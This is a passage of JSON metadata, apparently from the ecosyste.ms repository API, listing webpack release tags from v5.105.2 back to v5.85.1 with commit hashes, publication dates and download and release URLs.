y_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"h